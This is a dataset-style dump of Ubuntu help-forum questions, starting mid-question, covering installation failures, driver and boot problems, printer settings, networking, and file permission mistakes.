djl/djl/depot.py djl/djl/image.png djl/djl/ajout_jeu.py djl/djl/interface.py djl/djl/navigateur.py djl/djl/icone.png djl/djl/i18n/ djl/djl/i18n/sv_se/ djl/djl/i18n/sv_se/lc_messages/ djl/djl/i18n/sv_se/lc_messages/messages.mo djl/djl/i18n/sv_se/lc_messages/djl.po djl/djl/i18n/ru_ru/ djl/djl/i18n/ru_ru/lc_messages/ djl/djl/i18n/ru_ru/lc_messages/messages.mo djl/djl/i18n/ru_ru/lc_messages/djl.po djl/djl/i18n/pl_pl/ djl/djl/i18n/pl_pl/lc_messages/ djl/djl/i18n/pl_pl/lc_messages/messages.mo djl/djl/i18n/pl_pl/lc_messages/djl.po djl/djl/i18n/de_de/ djl/djl/i18n/de_de/lc_messages/ djl/djl/i18n/de_de/lc_messages/messages.mo djl/djl/i18n/de_de/lc_messages/djl.po djl/djl/i18n/pt_pt/ djl/djl/i18n/pt_pt/lc_messages/ djl/djl/i18n/pt_pt/lc_messages/messages.mo djl/djl/i18n/pt_pt/lc_messages/djl.po djl/djl/i18n/it_it/ djl/djl/i18n/it_it/lc_messages/ djl/djl/i18n/it_it/lc_messages/messages.mo djl/djl/i18n/it_it/lc_messages/djl.po djl/djl/i18n/es_es/ djl/djl/i18n/es_es/lc_messages/ djl/djl/i18n/es_es/lc_messages/messages.mo djl/djl/i18n/es_es/lc_messages/djl.po djl/djl/i18n/gl_es/ djl/djl/i18n/gl_es/lc_messages/ djl/djl/i18n/gl_es/lc_messages/messages.mo djl/djl/i18n/gl_es/lc_messages/djl.po djl/djl/i18n/fr_fr/ djl/djl/i18n/fr_fr/lc_messages/ djl/djl/i18n/fr_fr/lc_messages/messages.mo djl/djl/i18n/fr_fr/lc_messages/djl.po djl/djl/i18n/en_us/ djl/djl/i18n/en_us/lc_messages/ djl/djl/i18n/en_us/lc_messages/messages.mo djl/djl/i18n/en_us/lc_messages/djl.po djl/djl/i18n/hu_hu/ djl/djl/i18n/hu_hu/lc_messages/ djl/djl/i18n/hu_hu/lc_messages/messages.mo djl/djl/i18n/hu_hu/lc_messages/djl.po djl/djl/i18n.py djl/djl/palette_irc.py djl/djl/import_raccourcis.py djl/djl/modules.py djl/djl/journal_en.txt djl/webservice-src/ djl/webservice-src/djl.php djl/webservice-src/djl.sql djl/webservice-src/copying djl/readme djl/lisezmoi djl/copying djl/liesmich dell @ dell-inspiron-1420 : ~ $ is it installed or not ? when i search `` djl '' in dash it does n't show . the output of ls ~/downloads | grep djl is : dell @ dell-inspiron-1420 : ~ $ ls ~/downloads | grep djl djl-1.2.20.tar.gz dell @ dell-inspiron-1420 : ~ $ but if i use : tar -xvf djl-1.2.20.tar.gz output is : dell @ dell-inspiron-1420 : ~ $ tar -xvf djl-1.2.20.tar.gz tar : djl-1.2.20.tar.gz : can not open : no such file or directory tar : error is not recoverable : exiting now dell @ dell-inspiron-1420 : ~ $ another error ! so i installed gdebi ( an installing application ) and downloaded djl.deb from here right-clicked djl.deb and select `` open with gdebi '' . this is what i get in the terminal of gdebi : dpkg : error processing archive /home/dell/downloads/djl.deb ( -- install ) : parsing file '/var/lib/dpkg/tmp.ci/control ' near line 2 package 'djl ' : error in 'version ' field string '1.2.19_ubuntu_jaunty ' : invalid character in version number errors were encountered while processing : /home/dell/downloads/djl.deb using the cd command and the output is : dell @ dell-inspiron-1420 : ~ $ cd /home/downloads bash : cd : /home/downloads : no such file or directory dell @ dell-inspiron-1420 : ~ $ did i type something wrong or what ? seems like i have a problem with the directory 's . please help ! thanks to all the people that help me !
461901	unbinding alt in 14.04	after upgrading to 14.04 my ubuntu started capturing alt for window menu focus . this hides guake when i type alt+. , for example , and takes away the focus of many text fields . this shortcut is not listed in preferences- > keyboard - > shortcuts . how do i disable it ?
461907	my hp laserjet 2550l prints in color only now !	i have had an hp laserjet 2550l for a long time now . since i upgraded to 13.10 , i can not print in black and white anymore . before , the driver would give me an option in the print dialog . although i had to remember and change the setup each time i would print , since i rarely print color documents , it was n't that bad . however , no such option appears in the newer version . downgrading is always a very annoying feature update ! so i looked around and found that i had to go to preferences , printers , right click on my laserjet 2550l and select properties . in there , i can click on job options and on that screen i see defaults , including the print-color-mode which is set to color . clicking on the dropdown , i can select monochrome and then click either apply or save . in case of apply you immediately see the problem , it does not save the change ( it reverts right back to color . ) if you hit save and come back , same thing , it 's still on color and not monochrome as just saved . in what file is that data getting saved ? i found this file : /etc/cups/ppd/hp_color_laserjet_2550.ppd but changing the defaultcolorspace to gray in that file has no effect . the list of valid values for that field are defined here : http : //www.cups.org/documentation.php/doc-1.7/postscript-driver.html if i knew the file to which it is trying to save , i could try to edit that file instead ... p.s . i also tried to run the python script as root and although it does not ask me for my password , it still does n't keep my changes . sudo /usr/bin/python /usr/share/system-config-printer/system-config-printer.py
461910	13.10 to 14.04 lts firefox , email and desktop problems	i upgraded from 13.10 to 14.04 lts last week . there are a few problems : outlook : keeps saying to upgrade to the newest firefox ( firefox says it 's the most updated version ) , it wo n't load properly giving me an error screen then `` proceed to inbox anyway '' . i can not right click or highlight anything . i can not make changes to the settings . gmail : ca n't right click or highlight anything i was thinking it might be a problem with firefox since the upgrade . but have n't found any firefox forums yet with the same issues . i am also having general problems with serious lagging and the mouse/pointer while navigating around the desktop . running : sony vaio with intel® core™ i5-2450m cpu @ 2.50ghz × 4 intel® sandybridge mobile x86/mmx/sse2 32-bit 272.1 gb disk 5.9 gib total memory ( dual platform with windows 7 ) q : are there settings or plug-ins i may be missing ? any help would be much appreciated and thank you in advance !
461915	laptop overheating - lenovo z500	hi i have a lenovo z500 with i7 , 8gb ram , 1tb hdd . in windows 7,8 and 8.1 i do n't have any problem with the laptop temperature while running just the system or surfing the web , but under ubuntu 13.10 the system is overheating a lot ! ! ! i dont now what the problem is and how to fix it . i tried using tlp and laptop-mode-tools and the system is still overheating . i wonder if the os can damage the components by overheating ? is there any solution ( software ) to keep ubuntu 13.10 on my laptop without overheating ? the ouput of scaling_governor is : ondemand . temperatures : acpitz 54 , nvidia gpu - 66 , intel cpu - 75 , core zero 74 , core 1- 70 , core 2 - 72 , core 3 - 74 , this values are from psensor monitor . i tried upgrading to 14.04 but i cant make made ubuntu work in paralel with windows 8.1 were i dont have any problem with temperature . why only in ubuntu 13.10 and how to fix it ?
461917	x.org and xserver development headers issue	trying to install sdl2 , following the guide here . i 've tried this before , and it 's destroyed my laptop several times already , because one of the packages ( x.org-dev ) replaces a lot of packages , and those packages it is replacing are the ones enabling my touchpad to work , it also breaks lightdm , it creates an infinite loop at the login screen . has anyone been able to compile and install sdl2 correctly , without destroying their distros in the process ? i 'm using ubuntu 12.04 right now .
461920	recording audio from a cassette player	does anyone know how to record from a cassette player directly into the computer ( headphone output on the cassette player to the microphone socket on the computer ) and be able to hear the output at the same time ; and so therefore know when to stop recording ? i 'm using the gnome sound recorder at the moment but wonder if there 's anything better . thanks in advance .
461921	how do i reset unity default shortcuts ?	how do i reset the default value of unity shortcut ? in : `` system settings -▸ keyboard -▸ shortcuts ... '' for instances : i ca n't put the default alt l for the hud . i ca n't put the default alt+print to capture the active window . simply typing it does n't work . solving this in cli is preferable .
461922	bridging ports help	i have a bridge in place right now for my virtual machines using br0 with a virtual interface and eth0 but i now want to be able to monitor my network via adding a second ethernet card and bridging the two physical ethernet cards together . what would be the best thing to in terms of keeping my existing bridge running and adding this new one . can i create multiple bridges ? will this new bridge affect my existing one ? thanks , jerden
461928	menus not showing in gnome terminal on 14.04	my gnome terminal has stopped showing the menu bars when i mouse over the top bar . i 'm not sure why this is happening . i did a full update ( apt-get update ; apt-get dist-upgrade ) and then rebooted , but that did n't do anything . i even tried changing my shell to see if something in my profile was causing this behavior , but that did n't work either . is this a bug , or do i have something set wrong ? another error that showed up around the same time is that when in tmux pressing ctrl+p causes ^p to be written to the terminal . could these two errors be related ? after resetting my gnome-terminal settings this problem still exists , so it is unrelated .
461932	install dial up conexant modem driver from dell	i want to setup a dial-up connection on another computer ( ubuntu 12.04 ) without internet access . i have a conexant modem and i need to download a driver for this . according to this help page , the drivers provided ( for free ) by linuxant are only 14.4 kbps . are there any free drivers by dell that do n't have this speed restriction ? scanmodem tells me i need to install hsfmodem-7.80.02.05full_k3.11.0_15_generic_ubuntu_i386.deb.zip which is downloadable from linuxant . if there 's nothing provided by dell , what other options are there ?
461934	installed ubuntu ( on its own partition , windos 8 machine ) and lost both boot options in bios	i partitioned the unit in windows first , and after i disabled windows in bios because it was n't allowing the boot cd to load . after the installation , the option to enable windows and the option to enable ubuntu in bios were no longer there . how do i get them to function ?
461936	whole system freezes , even tty does not work	i upgraded from 13.10 to 14.04 and now after a while the complete os freezes . i ca n't even go into tty1 - tty6 . i have to use reisub to restart my machine . most of the time , it freezes when i use firefox ( aurora ) and play some music videos and surf through the internet . flash is not installed . although it also freezes sometimes , when i do not use firefox at all . are there any logs , which are helpful and provide them for you , since the reason for the freeze could be anything at all ? this is my hardware ( hope it helps in any way ) : intelâž coreâ˘ i7-3770 asus gtx660ti-dc2-og-2gd5 ( no special driver is installed , just the default one ) asus p8z77-v lx corsair dimm 8 gb ddr3-1600 kit samsung 830series 2,5 '' 256 gb ( windows is installed here ) seagate st31000524as 1 tb ( 3/4 are reserved for files ; 1/4 is for ubuntu ( 16gb swap included ) ) edit 01 : last time it froze , i watched a video and the sound kept playing , so i guess something with my displays ; lg ips235p-bn or my graphic card is wrong ? edit 02 : seems like there is a problem with my audio settings/setup . if i do n't watch any videos/listen to any music , ubuntu runs like a charm . when the system froze , i executed these commands from my android phone : sudo killall xorg sudo killall firefox sudo killall chrome but neither of those worked . the logs from /var/log/syslog can be found here . the complete kern.log file ( 1.4gb ! ) is filled with these 3 lines : may 10 20:32:46 m01 kernel : [ 11846.172008 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] trap ch 4 [ 0x027f996000 compiz [ 2206 ] ] may 10 20:32:46 m01 kernel : [ 11846.172020 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] gpc3/tpc0/mp trap : multiple_warp_errors may 10 20:32:46 m01 kernel : [ 11846.172030 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] gpc3/tpc1/mp trap : multiple_warp_errors
461939	feeling `` lost '' when i am on linux	i do n't know if this question really is on-topic for this website . but if i go to the `` productivity '' one i may not get so many linux people at once . my question is n't a technical one . it 's more `` spiritual '' . i want to use linux but i feel `` lost '' when i actually have it . do n't get me wrong , it 's not about knowledge or anything . i have no problem learning new things . i just have this feeling every time i wipe out windows to move to linux that does n't go away . like when you lose someone dear and after years you still feel him/her in your hearth . i want to move to linux . everything i have to do on windows i can visualize , so that is not an issue . also , there are huge benefits in moving to linux for me , as for the work i do it would really help having a linux machine to do `` dirty work '' ( grepping/one-liners/programming in a blink/ecc ) . i am really motivated . i think about it for all week at work . and i promise myself that in the weekend i 'll wipe off windows to put linux . but as soon as i do that i feel `` empty '' . like a part of me being ripped off . my question is : how can i overcome this feeling long enough to get into the habbit of using linux , so that i can switch operating systems like nothing ? i now it sounds silly but i am really in a dead end .
461942	fresh install ubuntu 14.04 server slow boot due to failure to connect 169.254.169.254	have just installed ubuntu server 14.04 and have no vm instances operational . boot time takes an eternity and on pressing f1 during loading this is what i see , the continued connect attempts and failures are endless any straightforward fixes would be appreciated ( note have replaced http with link in the log mentions to enable this posting ) : - cloud-init v. 0.7.5 running 'init-local ' at tue , 06 may 2014 19:42:27 +0000 . up 359.24 seconds . cloud-init v. 0.7.5 running 'init ' at tue , 06 may 2014 19:42:31 +0000 . up 363.43 seconds . ci-info : +++++++++++++++++++++++net device info++++++++++++++++++++++++ ci-info : + -- -- -- -- + -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -+ ci-info : | device | up | address | mask | hw-address | ci-info : + -- -- -- -- + -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -+ ci-info : | lo | true | 127.0.0.1 | 255.0.0.0 | . | ci-info : | em1 | false | . | . | 9c : b6:54:02:0d : ab | ci-info : + -- -- -- -- + -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -+ ci-info : ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! route info failed ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! 2014-05-06 20:42:33,252 - url_helper.py [ warning ] : calling 'link : //169.254.169.254/2009-04-04/meta-data/instance-id ' failed [ 0/120s ] : request error [ httpconnectionpool ( host='169.254.169.254 ' , port=80 ) : max retries exceeded with url : /2009-04-04/meta-data/instance-id ( caused by : [ errno 101 ] network is unreachable ) ] 2014-05-06 20:42:34,255 - url_helper.py [ warning ] : calling 'link : //169.254.169.254/2009-04-04/meta-data/instance-id ' failed [ 1/120s ] : request error [ httpconnectionpool ( host='169.254.169.254 ' , port=80 ) : max retries exceeded with url : /2009-04-04/meta-data/instance-id ( caused by : [ errno 101 ] network is unreachable ) ] 2014-05-06 20:42:35,259 - url_helper.py [ warning ] : calling 'link : //169.254.169.254/2009-04-04/meta-data/instance-id ' failed [ 2/120s ] : request error [ httpconnectionpool ( host='169.254.169.254 ' , port=80 ) : max retries exceeded with url : /2009-04-04/meta-data/instance-id ( caused by : [ errno 101 ] network is unreachable ) ]
461943	how do i open chromium in incognito mode by default ?	i would like to be able to open chromium in incognito mode automatically . i 'm new to linux and i love it so far but i have n't yet found a way to do this . i 'm using ubuntu 14.04 .
461947	how to display the ip address of the sender when rsyslog rejects a udp message ?	environment is ubuntu 12.04.4 lts with rsyslog 5.8.6 . i 've got rsyslog configured to receive messages via udp over the standard port 514 . it allows one specific host to send messages to it : $ allowedsender udp , 192.168.4.1 when i send a message from a different server , it rejects the message and logs : rsyslogd : udp message from disallowed sender discarded is it possible to configure rsyslog to include the ip address of the rejected sender ?
461950	fail to start graphical interface	i 'm using linux mint 14 and have faced the following problem recently : after removing and installing some of the software ( torchat and libreoffice to be exact ) and rebooting i found myself not being able to log into my system . first thing i noticed was simply a console line offering to enter my login and password , after that it greeted me with bash : /usr/lib/git-core/git-sh-prompt : no such file or directory all my attempts to run startx resulted in nothing but a black screen with an active mouse arrow briefly serfing the net i 've found that installing mdm could be a possible solution , however , after i did that , i 've started logging into this very black screen immediately , skipping any time in console so the only way to get to shell is to drop there using the recovery mode when i try to launch startx there i get the following message fatal server error : could not create lock file in /tmp/.tx0-lock xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error xauth : error in locking authority file /root/.xauthority also i ca n't remove or install anything using this shell due to blocking issues with /var/lib/dpkg/lock and being unable to write anything in /var/cache/apt/ i 'd appreciate any suggestions about working this mess out . thanks in advance
461951	pam usb on 14.04 su `` username '' = `` no passwd entry for user 'thornton ' ''	i followed the directions located here http : //linuxconfig.org/linux-authentication-login-with-usb-device once i reached step 4 i found that the changed authorizations did nothing , so i reverted back , saved over it so i whent back to the end of step 3 and looked up other tutorials and found a video ... . the video , which made a successful attempt , did not make any changes to the file . so , i tried login in with making no changes to the authorizations , no joy . when i see them do su `` username '' they get this 5 line , 6 line explenation from terminal about their login status . i get a single line that says `` no passwd entry for user 'thornton ' '' i dont know what i am doing wrong at this point . as stated in the title i am using the latest version of ubuntu and would like not to leave this half finished . it still asks me for my writen password and my writen password still works . everything in the pictures proveded match up with my results up until this point , so they are not a good reference for understanding where the problem is .
461953	assign `` extra '' mouse buttons	i have two thumb buttons on my mice . in windows ( using ms or logitech config software ) , can assign one as `` copy '' , and the other as `` paste '' - or their keyboard shortcut equivalents : ctrl-c , and ctrl-v , respectively . i have n't been able to find out how to do this in kubuntu ( 14.04 ) . oddly , the desktop settings allows setting buttons to interact with the desktop , but the mouse settings ( settings | system settings | input devices | mouse ) does n't allow configuring those buttons to perform specified functions within applications .
461954	problem with bash script not verifying pid file	the reason i 'm doing this script is because i want to deamonize supervisord , right now i 'm in a cloud host in which i do n't have access to the /etc or the sudo command , this script is my best attempt to do everything from my /home . i have this bash script with the start-stop-daemon command but it allows me to run it multiple times , and i would like it to just run just once . so far here is what i got : # ! /bin/bash supervisord=/usr/local/bin/supervisord pidfile=/home/user/supervisor/supervisord.pid opts= '' -c /home/user/supervisor/supervisord.conf -j $ pidfile '' test -x $ supervisord || exit 0 . /lib/lsb/init-functions export path= '' $ { path : + $ path : } /usr/local/bin : /usr/sbin : /sbin '' case `` $ 1 '' in start ) log_begin_msg `` starting supervisor daemon manager ... '' start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ supervisord -- $ opts || log_end_msg 1 log_end_msg 0 ; ; stop ) log_begin_msg `` stopping supervisor daemon manager ... '' start-stop-daemon -- stop -- quiet -- oknodo -- pidfile $ pidfile || log_end_msg 1 log_end_msg 0 ; ; restart|reload|force-reload ) log_begin_msg `` restarting supervisor daemon manager ... '' start-stop-daemon -- stop -- quiet -- oknodo -- retry 30 -- pidfile $ pidfile start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ supervisord -- $ opts || log_end_msg 1 log_end_msg 0 ; ; * ) log_success_msg `` usage : { start|stop|reload|force-reload|restart } '' exit 1 esac exit 0 i assume when the pid file is created it overwrites the previous one , so doing multiple stops does n't work either . how can i make this script just run once and not running multiple processes if i do `` script start '' 5 times , it should complain saying that the process is already running . please help
461958	ubuntu does not log in after installing nvida driver	after installing 14.04 on my plain notebook ( thinkpad l430 with nvs5400m graphic-card ) i also wanted to install the nvidia drivers . i did this via the gui in the system administration . ( as decribed here ubuntu wo n't login after installing nvidia drivers ) i tried version 331.38 as well as 304.117 . unfortunately i was not able to log on the unity any more after rebooting the system . it remained just purple . so i went to the shell and de-installed the nvidia driver manually . after that everything was fine again . but the problem is , that the computer is quite slow without the drivers and has micro-freezes from time to time . has anybody an idea , how i can find out what causes the error ? or has anybody had a similar problem ? or any idea how i can install the driver ?
461959	repair filesystem permission	i accidentally executed sudo chmod -r 777 / i was actually trying to change a specific folder permission recursively , btw i did stop the command before it changed everything . but now , i ca n't execute for example sudo every time i try to sudo something it throws me this error : effective uid is not 0 , is sudo installed setuid root ? btw i know i can use chown -r root : root /usr/bin where sudo is located , but of course i do n't have the permissions to do this . so , how can i revert this process ? or at least save the sudo file without reinstalling everything ? the system is still connected to the internet and seems to work fine besides the sudo issue . thanks in advance .
461962	system hangs on boot , black/purple screen	i ca n't boot my system . i set nomodeset and removed splash/quiet in grub . that causes a lot of boot text to go by , then the screen goes blank and that 's it . attempting to get to the shell ( ctrl+alt+f1 ) does nothing . in recovery mode , i can activate the root shell . any other choice ( dpkg , fsck , grub , whatever ) hangs immediately after showing the status of the drive . this is all i get : fsck from util-linux 2.20.1 /dev/sdc1 : clean , ... files , ... blocks _ and it just stops there . the only other filesystem listed in fstab is the swap partition . the only sign of any trouble is , during booting into recovery mode : hdio_get_identity failed for '/dev/sdc ' : invalid argument i do n't know if that 's a problem or not . any suggestions about where to start on fixing this ?
461963	unknown sounds in ubuntu 12.04	i just installed ubuntu 12.04 and i keep hearing those weird sounds but nothing on the screen changes . it seems like they are some sort of notifications but nothing really happens . does anybody know where they might be coming from ? i checked and they are not connected to any social network or e-mail . the sounds have random timing and are sometimes two or more in a row .
461964	can i install the 64 bit version ?	ok , i 've always , for some reason , thought that my cpu had 32 bit registers ... so i always installed the 32bit version of all oss that i 've used . now though i ran a lscpu , and i get : fer @ fer-lap : ~ $ lscpu arquitectura : i686 cpu op-mode ( s ) : 32-bit , 64-bit does this mean i can use 64 bit oss ? running these i get : fer @ fer-lap : ~ $ grep flags /proc/cpuinfo flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm and i have read that the lm flag means long mode , which stands for 64 bit cpus . also , as a last test , running lshw gives , for the cpu section : *-cpu:0 descripción : cpu producto : intel ( r ) core ( tm ) 2 duo cpu t5800 @ 2.00ghz fabricante : intel corp. id físico : 4 información del bus : cpu @ 0 versión : 6.15.13 serie : 0000-06fd-0000-0000-0000-0000 ranura : u2e1 tamaño : 2ghz capacidad : 4096mhz anchura : 64 bits it 's in spanish and the last line stands for width ( i guess register width ) . so ... can i install the 64 bit of the os ? will it be a big diference in performance ? because that 's what i 'm looking for ( does n't need to be a big difference ) thanks in advance .
461971	how to fix computer after uninstalling ubuntu	so i deleted the ubuntu partitions to add more space to my windows partition and did n't make a recovery disk to fix the bootloader . when i try to boot my laptop , it show the grub console thingy ... i have ubuntu on a usb and when i try to boot from the usb , it shows the grub thing again . is there any way to boot the ubuntu installer or windows from the grub thingy ?
461972	viewing installation log on failed ubuntu 12.04 installation ?	i have two identical hp dl380p g8 machines . one of the dl380p machines completed an `` unattended '' installation of ubuntu 12.04 w/o issue . the problem dl380p completes the reboot but is unable to load the os . i get a message on the console stating ; non-system disk or disk error . i am guessing that the grub installation/configuration messed up but , i 'm unable to look at the installation log to find out because the machine reboots too quickly . i 'm remote and i do n't have the option of hunting down a different .iso image or anything like that . again , the first one worked and i just need to get at the installation log file before the machine reboots so i can tell what the heck went wrong . any suggestions ?
461975	i ca n't edit , update , remove or install my broken packages	i have an elementary os based on ubuntu 12.04 . when i open synaptic package manager and i want to fix broken package , i get the following result and i ca n't update , remove or install any package : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 , < > line 1 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 , < > line 1 . setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 2 : clutter_ : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : install-info e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 2 : clutter_ : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : install-info please help me !
461981	lost ubuntu 14.04 default login screen	after trying to upgrade to gnome 3.12 unable to upgrade// uninstalled gnome 3.12 however lost ubuntu 14.04 default login screen plz help
461982	can my older nvidia video card work with ubuntu 14.04	i have a nvidia nv37gl quadro pci-e series rev a2 video card . i have been trying unsuccessfully to install ubuntu 14.04 . so far i either get a black screen or the back splash with no unity . i have tried to purge nvidia and add the recommended driver ( 173 ) using various methods . i have also tried using nvidia-current . i am wondering if anyone has this card and has successfully installed a fully working ubuntu 14.04 or do i accept i have to install 12.04 ?
461986	isolinux folder empty every usb installer creation	i 've spent the last two days exhaustively searching for an answer to this issue . it seems similar to others at first , but i assure y'all it is not quite the same . i have used unetbootin , universal usb installer , and something else i can not recall at the moment to try and create a mint 16 ( tried both cinnamon and mate ) usb installation disk . after receiving various error messages and researching them , i found that i am supposed to rename the isolinux folder to syslinux as well as two other similarly named files within . problem is , the isolinux/ folder is always empty . it 's not that i have my viewing preferences set to hide anything . and , furthermore , i 've downloaded the iso image from multiple sites with the same results even checking the hash to verify download integrity . simply put , no matter what i do , nothing is transferred into the isolinux/ folder during usb creation . i 've tried manually downloading the files and implanting them manually from various sources to no avail . i 'm still relatively new to all of this , but learning quickly . what am i doing wrong ? please forgive me if an answer to this exact issue exists elsewhere . i honestly have been looking for it as best as i know how , ( in between kid duty and naps ) , for almost 36 hours .
461994	high temperature with ubuntu 14.04	i do n't know what is the problem but i installed 14.04 and now the temperature is 78c any help please because this laptop will be burn my legs thanks
462003	assigning additional labeled aliases to a single physical network interface for ipv6 addresses	currently i am stuck trying to label the interfaces for additional ip addresses i am adding to an interface . let 's say the interface is eth0 ( $ iface ) , then for $ addrfam= '' inet '' i can add an ipv4 address to a labeled alias of eth0 like this : ip -f $ addrfam addr add 10.0.0.1 dev $ iface : test label $ iface : test which translates to ip -f inet addr add 10.0.0.1/32 dev eth0 : test label eth0 : test where the -f inet , i.e . ipv4 , is implied and could be left out . a cursory check with ifconfig yields : eth0 : test link encap : ethernet hwaddr aa : bb : cc : dd : ee : ff inet addr:10.0.0.1 bcast:0.0.0.0 mask:255.255.255.255 up broadcast running multicast mtu:1500 metric:1 trying something similar with ipv6 ( $ addrfam= '' inet6 '' ) : ip -f $ addrfam addr add fdbf:98fc:66a5 : de67 : :1/128 dev $ iface : test label $ iface : test which expands to ip -f inet6 addr add fdbf:98fc:66a5 : de67 : :1/128 dev eth0 : test label eth0 : test indicates no failure , but does n't yield the expected result either : eth0 link encap : ethernet hwaddr aa : bb : cc : dd : ee : ff [ ... ] inet6 addr : fdbf:98fc:66a5 : de67 : :1/128 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:5641 errors:0 dropped:0 overruns:0 frame:0 tx packets:5483 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:792232 ( 792.2 kb ) tx bytes:861177 ( 861.1 kb ) eth0 : test link encap : ethernet hwaddr aa : bb : cc : dd : ee : ff inet addr:10.0.0.1 bcast:0.0.0.0 mask:255.255.255.255 up broadcast running multicast mtu:1500 metric:1 what gives ? why does the labeling not give the expected effect of listing the address under eth0 : test ? for comparison , the respective lines from ip addr look like this : 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up group default qlen 1000 [ ... ] inet 10.0.0.1/32 scope global eth0 : test valid_lft forever preferred_lft forever [ ... ] inet6 fdbf:98fc:66a5 : de67 : :1/128 scope global valid_lft forever preferred_lft forever
462007	is there a way to set global/default system settings ( specifically gui scaling )	i added ubuntu 14.04 to my system ( macbookpro11,3 ) which has a hidpi screen . in system settings , i was able to set the gui scaling to 2.0 for my own account , and i 'm happy about that . however , the login screen uses the default 1.0 scaling , which makes it difficult to log in to my account . in addition , the guest account uses the 1.0 scaling , but that 's less of an issue . is there a configuration somewhere that i can use to adjust the default settings for the system ? i would personally also like to turn off tap-to-click globally , but that 's something i can deal with .
462009	how to have windows force minimise to cairo dock	i just installed ubuntu 14.0.4 on my hp envy m6 via dual boot with windows 8 . i have cairo dock installed and i 've been messing with its settings in advanced mode thoroughly , but i just ca n't get all apps and instances to minimise to cairo instead of unity 's launcher . how do i have all apps , instances and windows minimise to cairo dock instead of unity 's launcher ?
462015	can not boot into linux , low graphics error , can not boot into terminal	the title is a little confusing but this is the problem . i deleted my ubuntu partition and did n't bother to fix the bootloader so i enter the grub console when ever is boot my laptop up . i reinstall ubuntu and it was successful . when i rebooted it , it goes into low graphics . i followed the directions on the low graphics but terminal would load . right now i 'm reinstalling ubuntu but putting the bootloader ( or whatever it 's called ) on the same partition as the os . if this still does n't work , can someone help me solve my boot into terminal problem ?
462016	ubuntu 14.04 - new user account	i have a question regarding the creation of a new user on ubuntu 14.04 . when i go to `` user accounts '' and click `` + '' to make a new account it asks for `` account type '' , `` full name '' , and `` username '' . after selecting the account type and entering a `` full name '' it suggests a username which i accepted . it does not ask for a password , and when i try and login to the new user account no passwords are accepted . how do i set a password for this user account , and why does n't it ask this while creating the account ? thanks .
462021	how do i turn caps lock into an extra control key ?	there used to be a great set of options under keyboard that allowed me to choose stuff such as how the caps lock key behaves . how do i do this in 14.04 ?
462024	what does ubuntu use for getting/setting the time ?	there is a way to change ubuntu 's system time in the gui date & time settings , however , as with most tools , i 'm assuming that is just a front-end for one of ubuntu 's command-line tools . what commands does ubuntu use to get or set the system time ? can these be used in bash scripts , or are they limited to only be executable by the system ?
462025	how to use ntfs media drive as mysql data directory in ubuntu 14.04	i want to use my ntfs drive ( local/logical ) as mysql data directory . directory : /media/omar/coding/mysql/data . i have added the following line to /etc/fstab to auto mount the drive . uuid=driveid /media/omar/coding ntfs rw , permissions , defaults , user , locale=en_us.utf-8 0 0 and executed : sudo chown mysql : mysql /media sudo chown mysql : mysql /media/omar sudo chown mysql : mysql /media/omar/coding sudo chown mysql : mysql /media/omar/coding/mysql sudo chown -r mysql : mysql /media/omar/coding/mysql/data now when i try to start mysql , it shows fail . the error.log is having the following lines : 140507 05:11:44 mysqld_safe starting mysqld daemon with databases from /media/omar/coding/mysql/data 140507 5:11:44 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . 140507 5:11:44 [ warning ] ca n't create test file /media/omar/coding/mysql/data/omar-hp-probook-4530s.lower-test 140507 5:11:44 [ warning ] ca n't create test file /media/omar/coding/mysql/data/omar-hp-probook-4530s.lower-test 